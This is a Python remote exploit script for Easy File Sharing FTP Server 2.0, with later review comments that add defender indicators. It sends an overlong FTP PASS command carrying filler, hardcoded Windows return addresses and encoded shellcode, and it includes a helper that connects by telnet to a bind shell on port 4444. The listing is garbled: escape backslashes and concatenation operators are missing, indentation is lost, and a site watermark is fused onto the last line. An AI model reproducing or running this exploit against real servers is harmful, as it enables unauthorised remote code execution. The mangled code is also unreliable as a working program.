Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

#!/usr/bin/python

# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability

# was discovered by h07 and a POC for windows XP SP2 (polish version) was

# provided. This exploit was tested on windows 2000 server SP4. The exploit

# binds a shell on TCP port 4444.

#

# Author shall bear no responsibility for any screw ups

# Winny Thomas :-)

import os

import sys

import time

import struct

import socket

# Payload for the shell that the header comment says is bound on TCP port 4444.
# NOTE(review): this copy lost characters during page extraction, so the lines
# below are not the byte string the author shipped.
# After the first ten byte values, every value listed is in the printable ASCII
# range, which looks like the output of an alphanumeric encoder -- not
# confirmed from this page. Printable-only payloads pass filters that look for
# non-ASCII bytes in FTP commands, so a length limit on the PASS argument is
# the more dependable network control.
shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"

shellcode = "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"

shellcode = "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"

shellcode = "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"

shellcode = "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"

shellcode = "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"

shellcode = "x4ex56x46x42x46x42x4bx48x45x34x4ex33x4bx38x4ex37"

shellcode = "x45x50x4ax57x41x30x4fx4ex4bx38x4fx54x4ax31x4bx38"

shellcode = "x4fx45x42x32x41x30x4bx4ex49x34x4bx38x46x33x4bx38"

shellcode = "x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"

shellcode = "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"

shellcode = "x46x4fx4bx43x46x35x46x32x4ax52x45x47x45x4ex4bx58"

shellcode = "x4fx45x46x42x41x50x4bx4ex48x56x4bx58x4ex30x4bx34"

shellcode = "x4bx38x4fx45x4ex51x41x50x4bx4ex43x30x4ex42x4bx48"

shellcode = "x49x38x4ex46x46x52x4ex31x41x36x43x4cx41x43x4bx4d"

shellcode = "x46x36x4bx48x43x34x42x53x4bx48x42x44x4ex50x4bx58"

shellcode = "x42x47x4ex31x4dx4ax4bx48x42x54x4ax30x50x55x4ax56"

shellcode = "x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x36"

shellcode = "x43x35x48x36x4ax36x43x43x44x43x4ax36x47x37x43x57"

shellcode = "x44x53x4fx35x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"

shellcode = "x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx45x49x48x45x4e"

shellcode = "x48x56x41x48x4dx4ex4ax30x44x30x45x55x4cx56x44x30"

shellcode = "x4fx4fx42x4dx4ax56x49x4dx49x50x45x4fx4dx4ax47x55"

shellcode = "x4fx4fx48x4dx43x45x43x45x43x45x43x35x43x35x43x44"

shellcode = "x43x55x43x44x43x35x4fx4fx42x4dx48x46x4ax56x41x31"

shellcode = "x4ex45x48x36x43x55x49x58x41x4ex45x39x4ax56x46x4a"

shellcode = "x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"

shellcode = "x41x35x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"

shellcode = "x49x4ex47x45x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d"

shellcode = "x4ax46x45x4ex49x44x48x58x49x54x47x45x4fx4fx48x4d"

shellcode = "x42x35x46x45x46x55x45x45x4fx4fx42x4dx43x59x4ax56"

shellcode = "x47x4ex49x37x48x4cx49x37x47x45x4fx4fx48x4dx45x55"

shellcode = "x4fx4fx42x4dx48x56x4cx46x46x46x48x46x4ax36x43x46"

shellcode = "x4dx46x49x58x45x4ex4cx46x42x35x49x35x49x32x4ex4c"

shellcode = "x49x38x47x4ex4cx36x46x34x49x38x44x4ex41x53x42x4c"

shellcode = "x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x44x4ex32"

shellcode = "x43x59x4dx38x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax46"

shellcode = "x44x57x50x4fx43x4bx48x51x4fx4fx45x47x46x34x4fx4f"

shellcode = "x48x4dx4bx35x47x45x44x55x41x45x41x45x41x55x4cx36"

shellcode = "x41x30x41x35x41x45x45x45x41x45x4fx4fx42x4dx4ax46"

shellcode = "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx46"

shellcode = "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f"

shellcode = "x43x58x46x4cx46x56x4fx4fx48x4dx44x45x4fx4fx42x4d"

shellcode = "x4ax56x4fx4ex50x4cx42x4ex42x36x43x55x4fx4fx48x4d"

shellcode = "x4fx4fx42x4dx5a"

# Builds a telnet command line for TCP port 4444 on `target` and hands it to
# os.system(). Nothing in the visible listing calls this function.
# target: host name or address; the caller in this file takes it from argv.
# Defender view: a new listener on TCP 4444 on the FTP host, or an inbound
# connection to that port shortly after an FTP login attempt, is the
# host/network indicator that matches this step.
# NOTE(review): `target` is placed into a shell command string unquoted, so
# shell metacharacters in the argument would be interpreted by the local shell;
# an argv list passed to subprocess avoids that.
def ConnectRemoteShell(target):

connect = "/usr/bin/telnet " target " 4444"

os.system(connect)

# Connects to the FTP service on port 21 of `target`, prints the banner, sends
# USER anonymous and then a single PASS command carrying the payload; each
# server reply (read with recv(1024)) is printed.
# target: host name or address of the FTP server.
# Defender view: the PASS command is sent before any successful login, so every
# host that can reach port 21 can deliver it. The counts below (2553 filler
# bytes, 83 padding bytes, plus the payload) describe a PASS argument far
# longer than any real password; capping FTP command-argument length at a
# proxy or IDS catches it regardless of how the payload is encoded.
# The return addresses are tied to the DLL builds named in the comments below
# (kernel32.dll on Windows 2000 SP4, ws2_32.dll on XP SP2).
# NOTE(review): the socket is never closed and the recv() results are not
# checked before the next command is sent.
def ExploitFTP(target):

sockAddr = (target, 21)

tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

tsock.connect(sockAddr)

# Server banner.
response = tsock.recv(1024)

print response

# At the time of overflow EBX points into our shellcode

# Filler; the length is specific to this server build -- presumably the
# distance to the overwritten return address, which the page does not state.
payload = 'A' * 2553

# NOP's pad with a 15 byte jump over some junk and the RET address

# Jumps into our shellcode

payload = 'x90x90x90x90x90x90x90x90xebx0f'

# Address of 'call ebx' from kernel32.dll SP4

payload = struct.pack('<L', 0x7C577B03)

# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll

# But this one is not very reliable like Win2K SP4

#payload = struct.pack('<L', 0x71AB1269)

payload = 'x90' * 83

payload = shellcode

user = 'USER anonymousrn'

tsock.send(user)

response = tsock.recv(1024)

print response

# `x2c` is presumably the byte 0x2C (a comma) in the original script, so on
# the wire the PASS argument would begin with a comma -- confirm against an
# intact copy before relying on it as a signature.
passwd = 'PASS x2c' payload 'rn'

tsock.send(passwd)

response = tsock.recv(1024)

print response

# Script entry point: reads the target host from the first command-line
# argument, prints a usage line and exits with status -1 when it is missing,
# then calls ExploitFTP(target).
# NOTE(review): `time` is imported and ConnectRemoteShell is defined, but
# neither is used in the visible listing, so this copy may be missing lines.
# The `//http://www.leftworld.net` text fused onto the last line is not Python;
# it looks like a watermark added by a hosting site.
if __name__ == '__main__':

try:

target = sys.argv[1]

except IndexError:

print 'Usage: %s <target>' % sys.argv[0]

sys.exit(-1)

ExploitFTP(target)//http://www.leftworld.net
